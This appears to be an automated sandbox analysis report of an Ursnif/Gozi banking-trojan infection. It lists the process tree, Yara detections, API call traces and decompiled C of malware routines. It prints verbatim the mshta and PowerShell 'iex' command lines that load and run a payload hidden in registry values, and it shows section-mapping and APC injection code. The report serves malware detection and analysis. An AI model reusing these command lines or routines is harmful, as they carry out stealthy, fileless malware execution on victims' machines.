Imagebase:	0x160000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6504 Parent PID: 3104

General

Start time:	19:44:58
Start date:	26/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82962 /prefetch:2
Imagebase:	0x160000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6456 Parent PID: 3104

General

Start time:	19:45:06
Start date:	26/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17422 /prefetch:2
Imagebase:	0x160000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5272 Parent PID: 3104

General

Start time:	19:45:16
Start date:	26/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82978 /prefetch:2
Imagebase:	0x160000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 4220 Parent PID: 3292

General

Start time:	19:45:25
Start date:	26/01/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff6e9d40000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 6388 Parent PID: 4220

General

Start time:	19:45:28
Start date:	26/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff7e3240000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, Author: CCN-CERT
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5064 Parent PID: 6388

General

Start time:	19:45:29
Start date:	26/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 6220 Parent PID: 6388

General

Start time:	19:45:36
Start date:	26/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Imagebase:	0x7ff6481c0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 5132 Parent PID: 6220

General

Start time:	19:45:37
Start date:	26/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp' 'c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP'
Imagebase:	0x7ff7c8840000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 6016 Parent PID: 6388

General

Start time:	19:45:41
Start date:	26/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'
Imagebase:	0x7ff6481c0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 5856 Parent PID: 6016

General

Start time:	19:45:42
Start date:	26/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp' 'c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP'
Imagebase:	0x7ff7c8840000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: control.exe PID: 5824 Parent PID: 4496

General

Start time:	19:45:46
Start date:	26/01/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff6d37b0000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5312 Parent PID: 5824

General

Start time:	19:45:50
Start date:	26/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff6c98a0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 4496 Parent PID: 1892 regsvr32.exeCOMMON

Executed Functions

Function 02B87AFF, Relevance: 47.6, APIs: 25, Strings: 2, Instructions: 317memorylibrarynativeCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(02B9E268), ref: 02B87B1D

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

memset.NTDLL ref: 02B87B4E
RtlInitializeCriticalSection.NTDLL(05AE8D20), ref: 02B87B5F

Part of subcall function 02B8B1E7: RtlInitializeCriticalSection.NTDLL(02B9E240), ref: 02B8B20B
Part of subcall function 02B8B1E7: RtlInitializeCriticalSection.NTDLL(02B9E220), ref: 02B8B221
Part of subcall function 02B8B1E7: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B917C0), ref: 02B8B232
Part of subcall function 02B8B1E7: GetModuleHandleA.KERNEL32(02B9F01D), ref: 02B8B25F

Part of subcall function 02B81060: RtlAllocateHeap.NTDLL(00000000,-00000003,772F9EB0), ref: 02B8107A

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060), ref: 02B87B88
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B917C0), ref: 02B87B99
CloseHandle.KERNEL32(000002C0), ref: 02B87BAD
GetUserNameA.ADVAPI32(00000000,?), ref: 02B87BF6
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B87C09
GetUserNameA.ADVAPI32(00000000,?), ref: 02B87C1E
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 02B87C4E
OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 02B87C63
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B917C0), ref: 02B87C6D
CloseHandle.KERNEL32(00000000), ref: 02B87C77
GetShellWindow.USER32 ref: 02B87C92
GetWindowThreadProcessId.USER32(00000000), ref: 02B87C99
CreateEventA.KERNEL32(02B9E0D4,00000001,00000000,00000000,61636F4C,00000001,?,?), ref: 02B87D28
RtlAllocateHeap.NTDLL(00000000,00000018,61636F4C), ref: 02B87D52
OpenEventA.KERNEL32(00100000,00000000,05AE89B8), ref: 02B87D7A
CreateEventA.KERNEL32(02B9E0D4,00000001,00000000,05AE89B8), ref: 02B87D8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B917C0), ref: 02B87D93
GetLastError.KERNEL32(02B90120,02B9E04C,02B9E050), ref: 02B87E19
LoadLibraryA.KERNEL32(ADVAPI32.DLL,02B90120,02B9E04C,02B9E050), ref: 02B87E2D
SetEvent.KERNEL32(?,02B8046A,00000000,00000000), ref: 02B87EA6
RtlAllocateHeap.NTDLL(00000000,00000052,02B8046A), ref: 02B87EBB
wsprintfA.USER32 ref: 02B87EEB

Strings

0123456789ABCDEF, xrefs: 02B87B66
ADVAPI32.DLL, xrefs: 02B87E28

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemsetwsprintf
String ID: 0123456789ABCDEF$ADVAPI32.DLL
API String ID: 204107308-803475220
Opcode ID: abd2cb0f4bc1a07ed404c8c56de2041c591b348431b96f5801c2567cddf03e82
Instruction ID: a4708abb39766185816b70ea632c93bcad142f291cba0ebe7ae9273f6067e970
Opcode Fuzzy Hash: abd2cb0f4bc1a07ed404c8c56de2041c591b348431b96f5801c2567cddf03e82
Instruction Fuzzy Hash: 1AB1F274940305AFD720FF25DA45A2ABBE9EB45788B240CAEF54EC3240DB30E854DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 24.1, APIs: 16, Instructions: 126
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401000(intOrPtr _a4) {
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				long _v60;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				void* _t28;
				long _t31;
				long _t32;
				void* _t41;
				intOrPtr _t43;
				long _t48;
				intOrPtr _t49;
				signed int _t50;
				void* _t57;
				signed int _t61;
				void* _t63;
				intOrPtr* _t64;

				_t21 = E0040166F();
				_v52 = _t21;
				if(_t21 != 0) {
					L21:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t50 = 9;
					_t61 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t50;
					_t26 = E004018B4(0, _t61); // executed
					_v56 = _t26;
					Sleep(_t61 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L21;
				}
				_t27 = E004015F2(_t50); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L19:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L21;
				}
				if(_a4 != 0) {
					L11:
					_t28 = CreateThread(0, 0, __imp__SleepEx,  *0x40414c, 0, 0); // executed
					_t63 = _t28;
					if(_t63 == 0) {
						L18:
						_v56 = GetLastError();
						goto L19;
					}
					_t31 = QueueUserAPC(E0040116E, _t63,  &(_v44.wSecond)); // executed
					if(_t31 == 0) {
						_t48 = GetLastError();
						TerminateThread(_t63, _t48);
						CloseHandle(_t63);
						_t63 = 0;
						SetLastError(_t48);
					}
					if(_t63 == 0) {
						goto L18;
					} else {
						_t32 = WaitForSingleObject(_t63, 0xffffffff);
						_v60 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t63,  &_v60); // executed
						}
						CloseHandle(_t63);
						goto L19;
					}
				}
				if(E00401B50(_t50,  &_v48) != 0) {
					 *0x404138 = 0;
					goto L11;
				}
				_t49 = _v48;
				_t64 = __imp__GetLongPathNameW;
				_t41 =  *_t64(_t49, 0, 0); // executed
				_t57 = _t41;
				if(_t57 == 0) {
					L9:
					 *0x404138 = _t49;
					goto L11;
				}
				_t15 = _t57 + 2; // 0x2
				_t43 = E00401BD2(_t57 + _t15);
				 *0x404138 = _t43;
				if(_t43 == 0) {
					goto L9;
				}
				 *_t64(_t49, _t43, _t57); // executed
				E004019CF(_t49);
				goto L11;
			}

0x0040100c
0x00401015
0x00401019
0x0040115f
0x00401165
0x00000000
0x00000000
0x00000000
0x0040101f
0x0040101f
0x00401024
0x0040102a
0x00401039
0x0040103a
0x0040103d
0x00401040
0x00401049
0x0040104d
0x00401053
0x00401057
0x0040105e
0x00000000
0x00000000
0x00401064
0x0040106b
0x0040106f
0x00401150
0x00401150
0x00401157
0x00401159
0x00401159
0x00000000
0x00401157
0x00401078
0x004010cb
0x004010dd
0x004010e3
0x004010e7
0x00401146
0x0040114c
0x00000000
0x0040114c
0x004010f4
0x00401102
0x0040110a
0x0040110e
0x00401115
0x00401118
0x0040111a
0x0040111a
0x00401122
0x00000000
0x00401124
0x00401127
0x0040112f
0x00401133
0x0040113b
0x0040113b
0x00401142
0x00000000
0x00401142
0x00401122
0x00401086
0x004010c5
0x00000000
0x004010c5
0x00401088
0x0040108c
0x00401095
0x00401097
0x0040109b
0x004010bd
0x004010bd
0x00000000
0x004010bd
0x0040109d
0x004010a2
0x004010a9
0x004010ae
0x00000000
0x00000000
0x004010b3
0x004010b6
0x00000000

APIs

Part of subcall function 0040166F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00401011), ref: 0040167E
Part of subcall function 0040166F: GetVersion.KERNEL32(?,00401011), ref: 0040168D
Part of subcall function 0040166F: GetCurrentProcessId.KERNEL32(?,00401011), ref: 0040169C
Part of subcall function 0040166F: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00401011), ref: 004016B5

GetSystemTime.KERNEL32(?), ref: 00401024
SwitchToThread.KERNEL32 ref: 0040102A

Part of subcall function 004018B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,00401045,00000000), ref: 0040190A
Part of subcall function 004018B4: memcpy.NTDLL(?,00401045,?,?,00000000,?,00000000,?,?,?,?,?,?,00401045,00000000), ref: 0040199C
Part of subcall function 004018B4: VirtualFree.KERNELBASE(00401045,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,00401045,00000000), ref: 004019B7

Sleep.KERNELBASE(00000000,00000000), ref: 0040104D
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401095
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004010B3
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 004010DD
QueueUserAPC.KERNELBASE(0040116E,00000000,?), ref: 004010F4
GetLastError.KERNEL32 ref: 00401104
TerminateThread.KERNEL32(00000000,00000000), ref: 0040110E
CloseHandle.KERNEL32(00000000), ref: 00401115
SetLastError.KERNEL32(00000000), ref: 0040111A
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00401127
GetExitCodeThread.KERNELBASE(00000000,?), ref: 0040113B
CloseHandle.KERNEL32(00000000), ref: 00401142
GetLastError.KERNEL32 ref: 00401146
GetLastError.KERNEL32 ref: 00401159

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
String ID:
API String ID: 2478182988-0
Opcode ID: 7695535d71a438801c48d71af85cd61f65322660d260b27873ff94e1591cb5a5
Instruction ID: 232fdd179a3263cb08b9af4244e4bb55ee7f948468ec02634b860019ecc5d841
Opcode Fuzzy Hash: 7695535d71a438801c48d71af85cd61f65322660d260b27873ff94e1591cb5a5
Instruction Fuzzy Hash: 2241B871401251ABD320EF759D48C5BBFECEAC9755B10063BF951F22A0E738CA45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 02B916A5, Relevance: 12.1, APIs: 8, Instructions: 114stringCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,02B9E0D8,00000000), ref: 02B916D3
StrRChrA.SHLWAPI(05AE85A8,00000000,0000005C,00000000,00000001,00000000,02B9E0B4,00000000,?), ref: 02B916E8
_strupr.NTDLL ref: 02B916FE
lstrlen.KERNEL32(05AE85A8), ref: 02B91706
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,02B9E0B4,00000000,?), ref: 02B91786
RtlAddVectoredExceptionHandler.NTDLL(00000000,02B846B0), ref: 02B917AD
GetLastError.KERNEL32(?), ref: 02B917C7
RtlRemoveVectoredExceptionHandler.NTDLL(02BB05B8), ref: 02B917DD

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
String ID:
API String ID: 1098824789-0
Opcode ID: 3b6e38bbf76fad9f658e06507fde1ff851554cc5c37cd7f9bb2a786d145e1de2
Instruction ID: 1abf3ea259a048413c826df9f996d191a6e5c0cb8076f5d636f843a6cc7d4581
Opcode Fuzzy Hash: 3b6e38bbf76fad9f658e06507fde1ff851554cc5c37cd7f9bb2a786d145e1de2
Instruction Fuzzy Hash: 40316CB2D50212AFEF10EF7C9E8692E77A5E7043D4B040DBAF905D3180D735C8908B61

Uniqueness

Uniqueness Score: -1.00%

Function 02B7ACD5, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,00000000), ref: 02B7AD1C
NtOpenProcessToken.NTDLL(00000000,00000008,00000001), ref: 02B7AD2F
NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 02B7AD4B

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 02B7AD68
memcpy.NTDLL(00000000,00000000,0000001C), ref: 02B7AD75
NtClose.NTDLL(00000001), ref: 02B7AD87
NtClose.NTDLL(00000000), ref: 02B7AD91

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 8ee3ee8c6c2ec190d74fc442f4a04107358839d9cf2e9c0afb95c02a6c359a46
Instruction ID: 2ef6a7d5688ac0e0ec076090d574667042d383c041a7da43f9335651b883e2da
Opcode Fuzzy Hash: 8ee3ee8c6c2ec190d74fc442f4a04107358839d9cf2e9c0afb95c02a6c359a46
Instruction Fuzzy Hash: 3021E4B2940218BBDB01AFA5DD85ADEBFBDEF09B80F104066F914E6120D7719A549FA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B7A027, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 02B7A052
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 02B7A05F
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 02B7A0EB
GetModuleHandleA.KERNEL32(00000000), ref: 02B7A0F6
RtlImageNtHeader.NTDLL(00000000), ref: 02B7A0FF
RtlExitUserThread.NTDLL(00000000), ref: 02B7A114

Part of subcall function 02B88B88: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02B7A08D,?), ref: 02B88B90
Part of subcall function 02B88B88: GetVersion.KERNEL32 ref: 02B88B9F
Part of subcall function 02B88B88: GetCurrentProcessId.KERNEL32 ref: 02B88BAE
Part of subcall function 02B88B88: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02B88BCB

Part of subcall function 02B78CA2: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 02B78CF4
Part of subcall function 02B78CA2: memcpy.NTDLL(?,?,?,?,?,?), ref: 02B78D85
Part of subcall function 02B78CA2: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 02B78DA0

Part of subcall function 02B73CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,02B8F65A), ref: 02B73CCA

Part of subcall function 02B833D3: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,02B74655,00000000), ref: 02B833EE
Part of subcall function 02B833D3: IsWow64Process.KERNEL32(?,?,?,?,?,?,02B74655,00000000), ref: 02B833FF
Part of subcall function 02B833D3: FindCloseChangeNotification.KERNELBASE(?,?,?,?,02B74655,00000000), ref: 02B83412

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateFileModuleOpenThreadTimeVirtual$AllocChangeCloseCurrentEventExitFindFreeHandleHeaderHeapImageInformationNameNotificationQuerySystemUserVersionWow64memcpy
String ID:
API String ID: 1973333951-0
Opcode ID: b1ac3ab2acdb46e9a42723eadee9d8265b863c63fc0219a22b8deca5acac69eb
Instruction ID: cf3cbebe1eb611353cfd69fd2ab4fc07e74987b8b21339ed71d6bcfb190d02a2
Opcode Fuzzy Hash: b1ac3ab2acdb46e9a42723eadee9d8265b863c63fc0219a22b8deca5acac69eb
Instruction Fuzzy Hash: 4B31E332940118EFDB21EF74DD85AAEBBB8FB46790F1549A9E522E7140D730CD44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00401C22, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401C22(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401AD1(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401c2b
0x00401c32
0x00401c33
0x00401c34
0x00401c35
0x00401c36
0x00401c47
0x00401c4b
0x00401c5f
0x00401c62
0x00401c65
0x00401c6c
0x00401c6f
0x00401c76
0x00401c79
0x00401c7c
0x00401c7f
0x00401c84
0x00401cbf
0x00401c86
0x00401c89
0x00401c8f
0x00401c94
0x00401c98
0x00401cb6
0x00401c9a
0x00401ca1
0x00401caf
0x00401caf
0x00401c98
0x00401cc7

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,00000002), ref: 00401C7F

Part of subcall function 00401AD1: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401C94,00000002,00000000,?,?,00000000,?,?,00401C94,?), ref: 00401AFE

memset.NTDLL ref: 00401CA1

Strings

@, xrefs: 00401C6F

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a4b2d7ccb7a4b4173cfa15131034b09751e21d49243ad00eb51d5121aa156739
Instruction ID: 7715217575c3e06d1a9915d28873b842a8b51a5d05173ceae1404d11b9e03581
Opcode Fuzzy Hash: a4b2d7ccb7a4b4173cfa15131034b09751e21d49243ad00eb51d5121aa156739
Instruction Fuzzy Hash: 23210BB1D00209AFDB11DFA9C8849DEFBF9FB48354F10453AE506F7250D7349A458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B86CBC, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 02B86CE1
NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 02B86CFD

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

Part of subcall function 02B8AC94: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 02B8ACBD
Part of subcall function 02B8AC94: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,02B86D3E,00000000,00000000,00000028,00000100), ref: 02B8ACDF

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000000,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 02B86E67

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
String ID:
API String ID: 3547194813-0
Opcode ID: 82c2b0e36618e5aad9a1e2fe936ce7418ddf772f6e30c87f8b2b8ae1fdbe02ca
Instruction ID: 2f0f72c0920e76a280b04bf5b26835762e3ffb41e511469dd32dfb116b49e808
Opcode Fuzzy Hash: 82c2b0e36618e5aad9a1e2fe936ce7418ddf772f6e30c87f8b2b8ae1fdbe02ca
Instruction Fuzzy Hash: B1614071A0020AEFDF15EF99C980BAEBBB9FF08305F044499E918E7251D770E955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B77E14, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B77E28
GetProcAddress.KERNEL32(6F57775A), ref: 02B77E50
NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,?,?,00001000,00000000), ref: 02B77E6E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AddressInformationProcProcess64QueryWow64memset
String ID:
API String ID: 2968673968-0
Opcode ID: 843a415f30de3d28230f599363cbcb251095bb284d810733714321192fa7e00b
Instruction ID: 1cf4051674dfb7716b5977d430c46c3a80c315c798eb84a33d2ad87440f3b771
Opcode Fuzzy Hash: 843a415f30de3d28230f599363cbcb251095bb284d810733714321192fa7e00b
